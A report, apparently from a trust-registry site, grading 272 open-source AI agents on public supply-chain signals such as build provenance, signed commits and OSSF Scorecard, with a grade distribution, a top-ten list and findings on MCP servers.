The State of AI Agent Supply-Chain Trust (2026)
2026 was the year AI agents stopped being demos and started being dependencies — wired into CI pipelines, handed cloud credentials, and granted tool access to real systems. It was also the year supply-chain attackers noticed. So we asked a simple question: how verifiable is the open-source AI agent ecosystem, really?
We graded 272 open-source AI agents on public, checkable supply-chain signals — build provenance, package provenance, signed commits, OSSF Scorecard, license, and maintenance — and rolled them into an evidence grade from A to D. Here's the picture.
The grade distribution
Evidence grade reflects how much of a project's trust can be independently verified from public data — not a verdict on whether it's "good" software. On that axis, the ecosystem is bottom-heavy.
| Grade | Agents | Share | |
|---|---|---|---|
| A | 35 | 13% | |
| B | 65 | 24% | |
| C | 56 | 21% | |
| D | 116 | 43% |
The provenance gap is the headline
The single most consequential finding: only 47 of 272 agents (17%) publish any build provenance. Of the 170 agents published to a package registry, 72% ship no package provenance, and 20% of all agents have zero signed commits. As the 2026 TrapDoor and TanStack/Mistral campaigns showed, build provenance is the one signal that makes registry injection detectable — and most of the ecosystem can't offer it.
The top 10 by HVTrust
The highest-ranked agents share a profile: they publish provenance, sign commits, and score above the median on OSSF Scorecard. Popularity is conspicuously absent from that list — these rank on verifiability, not stars.
| # | Agent | Grade | OSSF |
|---|---|---|---|
| 1 | Haystack | A | 8.4 |
| 2 | LangGraph | A | 6.8 |
| 3 | n8n | A | 6.6 |
| 4 | Codex | A | 6.6 |
| 5 | Vercel AI SDK | A | 6.4 |
| 6 | Cline | A | 6.0 |
| 7 | OpenAI Agents SDK | A | 6.3 |
| 8 | PydanticAI | A | 6.1 |
| 9 | LiveKit Agents | A | 6.7 |
| 10 | MLflow | A | 5.6 |
MCP is now mainstream — and mostly unverifiable
45% of the agents we track now implement or declare a Model Context Protocol server, the interface that lets agents broker your credentials and tools. Of those, 76% ship no build provenance — meaning the components most likely to be granted system access are, as a group, among the hardest to verify. We dug into this in a separate report on MCP servers and trust.
What we measured (and what we didn't)
HVTrust is built from public, reproducible signals: OSSF Scorecard, build and package provenance, signed-commit ratio, license, maintenance freshness, and adoption — scaled by how much checkable evidence exists. Every number on every profile links back to its source.
What it is not is a judgment of code quality or capability. A high grade means a project does the boring, verifiable security work and you can confirm it; a low grade means a gap in public evidence, not a proven risk. Some signals reward newer practices like provenance, which can understate older but well-run projects. We publish the full methodology and the underlying data under CC BY 4.0 so you can check or rebuild any of this yourself.
Explore the full registry
All 272 agents, every signal, refreshed throughout the day. Free, open data, no signup.
Browse the trust registryData from HVTracker signals as of June 21, 2026. Figures are a point-in-time snapshot and shift as the registry refreshes. Full methodology · Download the data. Related reports: MCP servers and trust · provenance vs. the 2026 attacks.